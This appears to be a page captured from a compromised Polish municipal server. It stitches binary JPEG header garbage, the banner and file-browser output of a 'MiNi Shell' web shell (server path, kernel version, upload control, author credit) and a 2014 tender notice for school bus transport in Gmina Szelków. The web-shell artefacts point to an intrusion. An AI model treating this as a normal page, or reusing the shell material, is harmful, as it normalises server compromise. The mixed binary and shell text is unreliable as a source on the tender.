JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20140716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20140716/155227-N-2014.html

<p class="kh_header"><b>Stary Szelków: Dowóz uczniów do szkół z terenu Gminy Szelków w roku szkolnym 2014-2015, 
2015-2016</b><br>
<b>Numer ogłoszenia: 155227 - 2014; data zamieszczenia: 16.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szelków , Stary Szelków 39, 06-220 Stary Szelków, woj. mazowieckie, tel. 029 7176001, faks 029 7176004 w. 28.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.szelkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do szkół z terenu Gminy Szelków w roku szkolnym 2014-2015, 
2015-2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi dowozu uczniów do szkół oraz przedszkola na terenie Gminy Szelków.	W zakres usługi wchodzi przewóz dzieci i młodzieży z miejsca zamieszkania do szkoły i ich odwiezienie po zajęciach do miejsca zamieszkania bez opiekuna. Zamówienie obejmuje  przewóz ok. 255 uczniów do przedszkola, szkoły podstawowej i gimnazjum. Podana liczba uczniów może ulec zmianie w czasie trwania roku szkolnego. Długość trasy ok. 264,1 km dziennie.
Trasy dowozu dzieci:

TRASY       PRZYJAZDU - realizacja w godz. 650-755

Autobus 1     godz. 6:50  

Trasa 1
Stary Szelków - Orzyc - Ciepielewo - Zakliczewo - Głódki(5) - Pomaski Wielkie (17) - Pomaski Małe (6) - Zakliczewo (25) - Ciepielewo (13) - Orzyc (16) - Stary Szelków
 
82 osób						31,8 km

Trasa 2   godz. 7:40 - 7:55
Stary Szelków - Nowy Strachocin(28) - Magnuszew Duży (9) - Stary Szelków 
				 37 osób					             7,5 km

Autobus 2   godz. 7:00

Stary Szelków - Laski(16) - Magnuszew Mały(6) -Przeradowo Wygoda (4) - Przeradowo (18) -  Magnuszew Mały(12) - Nowy Strachocin - Stary Strachocin (8) - Nowy Strachocin - Stary Szelków
 
				64 osób					          28,8 km

Autobus 3   godz. 7:00

Stary Szelków - Orzyc - Ciepielewo (1) - Smrock-Dwór(10) - Chyliny (16) - Chyliny - Smrock-Dwór (3) - Smrock Kolonia (13)  - Nowy Szelków (13) - Rostki (8) - Kaptury (8) - Stary Szelków
				72 osoby				           	 24,2 km
										
------------------------------
Razem: 255 osób       92,3 km

TRASY	ODJAZDU    

  Autobus 1    

 Godzina odjazdu - 13:05

Stary Szelków - Orzyc (7) - Ciepielewo (3) - Zakliczewo (10) - Pomaski Małe (3)- Głódki (1) - Pomaski Wielkie (8) - Stary Szelków
				
32 osób					31,8 km

Godzina odjazdu - 14:35

Stary Szelków - Orzyc (9) - Ciepielewo (11) - Zakliczewo (15) - Pomaski Małe (3) - Głódki (4) - Pomaski Wielkie (9) - Stary Szelków

				       51 osób					31,8 km

Autobus 2 

Godzina odjazdu -13:00

Stary Szelków - Magnuszew Duży (2) - Nowy Strachocin (8) - Stary Strachocin (2) - Magnuszew Mały (0) - Magnuszew Mały (1) - Przeradowo Wygoda (7) - Magnuszew Mały - Laski (4) - Stary Szelków
				      26 osób				          29,9 km	

Godzina odjazdu -14:30

Stary Szelków - Magnuszew Duży (7) - Nowy Strachocin (20) - Stary Strachocin (6) - Magnuszew Mały (5) - Magnuszew Mały (7) - Przeradowo Wygoda (15) - Magnuszew Mały (3) - Stary Szelków	
					63 osoby 		                            23,4 km

Autobus 3

Godzina odjazdu -13:00

Stary Szelków - Orzyc - Ciepielewo - Smrock-Dwór (6) - Chyliny (13) - Smrock-Dwór - Smrock-Kolonia(7) - Nowy Szelków (4) -  Rostki (2) - Kaptury (8) -Stary Szelków
				       40 osób					24,2 km

Godzina odjazdu -14:30

Stary Szelków - Laski (12) - Orzyc (0) - Ciepielewo (0) - Smrock-Dwór (7) - Chyliny (3) - Smrock - Dwór (0) - Smrock-Kolonia  (6) - Nowy Szelków (9) - Rostki (6) - Kaptury (0) - Stary Szelków
		                  		43 osoby 			          30,7 km

171,8 km
-----------------------------								         
Razem:  255  osób	 264,1 km 

W celu zapewnienia dowozu wszystkim dzieciom do szkół, Zamawiający zastrzega sobie prawo do zmiany tras i godzin dowozu w przypadku wystąpienia okoliczności nieprzewidzianych na etapie ogłaszania przetargu.

Uwaga: Transport dzieci do szkół może być realizowany również  poprzez transport otwarty ( dostępny dla innych pasażerów) z dowozem uczniów.

Przewozy w oparciu o linie otwarte muszą być prowadzone z pierwszeństwem przejazdu dla dzieci i młodzieży szkolnej.
Ponadto Wykonawca zobowiązany jest do wystawienia bezpłatnego biletu do przejazdu opiekunów dzieci.

1.Zamawiający wymaga, aby autobusy którymi świadczona będzie  usługa transportu uczniów były w pełni sprawne technicznie. Wykonawca musi dysponować co najmniej trzema autobusami  z 54  miejscami siedzącymi, każdy wyprodukowany po 2004 r., którymi to będzie świadczył usługę do dowozu dzieci do szkół i przedszkola. Wykonawca  w tym zakresie zobowiązany jest do przestrzegania przepisów określonych w Rozporządzeniu Ministra Infrastruktury  z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia ( Dz. U. z 2013 r., poz. 951 ). 
2.Usługa będzie świadczona według ustalonego z Dyrektorami poszczególnych szkół  rozkładu kursów autobusów, który będzie dostosowany do planu zajęć tych placówek. W rozkładzie kursów autobusów będą ustalone godziny świadczenia usługi dowozu uczniów, punkty zbiórki uczniów w uzgodnieniu z Zamawiającym. Wykonawca  zamówienia przedłoży rozkład kursów autobusów w terminie do 31.08.2014r. przy uwzględnieniu godzin i tras wskazanych przez zamawiającego na mapach stanowiących integralną część SIWZ.
3.Wykonawca będzie zobowiązany do zapewnienia:
a)trzech w pełni sprawnych techniczne, wyprodukowanych po 2004 roku o minimalnej    liczbie  miejsc siedzących 54 w każdym z autobusów.  Autobusy te zgodnie z obowiązującymi przepisami muszą spełniać warunki,  które  są wymagane dla autobusów szkolnych. Stan techniczny autobusów świadczących usługę musi zostać potwierdzony odpowiednimi dokumentami przeglądów technicznych. Każdy z autobusów musi posiadać ważne ubezpieczenie OC. Dokumenty te powinny być okazane na każde żądanie Zamawiającego. 
b)dpowiednich warunków bezpieczeństwa, higieny i wygody pojazdów,
c)Przestrzegania ustalonego rozkładu czasowego i tras przejazdów,
d) W przypadku awarii autobusu zastępczego środka transportu wyprodukowanego również po 2004 roku.
4.Długość wszystkich tras, na których świadczone będą  usługi dowozu w każdy dzień  nauki  szkolnej będzie wynosiła około 264,1 km.
5.Dowóz uczniów będzie odbywał się w dni nauki szkolnej. Liczba dni   objętych 
   zamówieniem dowozu uczniów wynosi ok. 376 dni..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości 2400,00 zł (słownie złotych: dwa tysiące czterysta złotych).
Wadium może być wnoszone w następujących formach:
1. w pieniądzu,
2. w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -    kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3. w gwarancjach bankowych,
4. w gwarancjach ubezpieczeniowych,
5. w poręczeniach, o których mowa w art. 45 ust. 6 pkt 5 ustawy Prawo zamówień  publicznych.
Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania. Wadium musi być wniesione przed upływem terminu składania ofert.
Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto Urzędu Gminy w Szelkowie, WBK Bank Zachodni w Makowie Mazowieckim
 Nr 79 1500 1588 1215 8005 0952 0000
Za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Wadium wniesione w pieniądzu Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek oferenta.
Oferent, którego oferta została wybrana traci wadium na rzecz Zamawiającego gdy:
a. odmówi podpisania umowy na warunkach określonych w ofercie,
b. odmówi wniesienia zabezpieczenia należytego wykonania umowy,
c. zawarcie umowy stało się niemożliwe z winy oferenta.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Wykonawca musi wykazać, że posiada:  1. aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert ( zał. nr 3 do SIWZ). 2. Koncesję, zezwolenie lub licencję na usługi transportowe / przewóz osób/.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia do oferty należy załączyć następujące oświadczenia lub dokumenty: wykaz wykonanych w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowanych co najmniej 2 usług  polegających na dowożeniu dzieci do szkół, o wartości co najmniej 100 000,00 zł brutto każda (wg załącznika 4 do SIWZ) wraz z podaniem ich  wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie (przy czym brak w załączniku Nr 4 do SIWZ wykonanego  zadania o powyższych cechach będzie równoznaczny z brakiem wymaganego doświadczenia) oraz załączeniem dowodów, że usługi zostały wykonane lub są wykonywane należycie. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w/g formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowanie odpowiednim potencjałem technicznym  - Wykonawca zobowiązany jest wykazać, że na czas realizacji zamówienia będzie dysponował: co najmniej  3  autobusami wyprodukowanymi po 2004r. posiadającymi aktualne ubezpieczenia OC i NW, o minimalnej liczbie  co najmniej 54 miejsc siedzących  przewidzianych do wykonania przedmiotu zamówienia  / typ pojazdu, rok produkcji, ilość miejsc wraz z aktualnymi badaniami technicznymi/, Zamawiający w razie wątpliwości zastrzega sobie prawo wglądu w  dokumenty potwierdzające spełnianie niniejszego warunku . Warunek posiadania autobusów uważa się za spełniony, jeżeli Wykonawca wykaże się własnością lub prawem do dysponowania. Załącznik  Nr 5 do SIWZ. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w/g formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do spełnienie warunku - dysponowanie osobami zdolnymi do wykonywania zamówienia Wykonawca zobowiązany jest wykazać, że na czas realizacji zamówienia będzie dysponował co najmniej 3 osobami, które posiadają uprawnienia do prowadzenia  autobusów, a także legitymują się co najmniej 3 - letnim stażem pracy w charakterze kierowcy autobusu oraz spełniają  wymagania określone 
w przepisach Prawa o ruchu  drogowym wraz z informacją o podstawie dysponowania tymi osobami, zgodnie z zał. Nr 6 do SIWZ - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia.Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w/g formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku znajdowania się w sytuacji ekonomicznej i finansowej Zamawiający oceni na podstawie oświadczenia złożonego przez Wykonawcę - złożenie oświadczenia o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo zamówień publicznych, na druku załączonym do niniejszej specyfikacji (zał. nr 2 ) Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w/g formuły: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do terści oferty,  na podstawie której dokonano wyboru Wykonawcy. Zamawiający dopuszcza zmiany niniejszej umowy dotyczące: 
1) terminu realizacji zamówienia - jeżeli zmiana terminu realizacji zamówienia będzie   korzystna dla Zamawiającego lub konieczność zmiany terminu wynika ze zdarzeń niezależnych od Przewoźnika, których nie dało się przewidzieć przy zawieraniu umowy, 
 2) zmiany tras, godzin przejazdów oraz liczby dowożonych osób, w przypadkach: 
a. działania siły wyższej, 
b. przyjęcia nowych uczniów do placówek oświatowych, 
c. skreślenia dziecka z listy uczniów danej placówki oświatowej, 
d. zmiany w szkolnym planie nauczania
3) zmiany zaistniałe z przyczyn organizacyjnych np.: zmiana danych teleadresowych lub innych danych podmiotowych
4) ustawowej zmiany stawki podatku VAT. 
2. Wszystkie powyższe postanowienia niniejszego §14 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę; nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
3. Zmiany mogą być dokonane tylko, jeśli jest to niezbędne dla prawidłowego wykonania przedmiotu umowy.
4. Wszelkie zmiany do niniejszej umowy wymagają dla swojej ważności, formy pisemnej w postaci aneksu zatwierdzonego przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szelkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Szelkowie, Stary Szelków 39, 06-220 Stary Szelków, powiat makowski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2014 godzina 10:00, miejsce: Urząd Gminy w Szelkowie, Stary Szelków 39, 06-220 Stary Szelków, pok. Nr 8 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com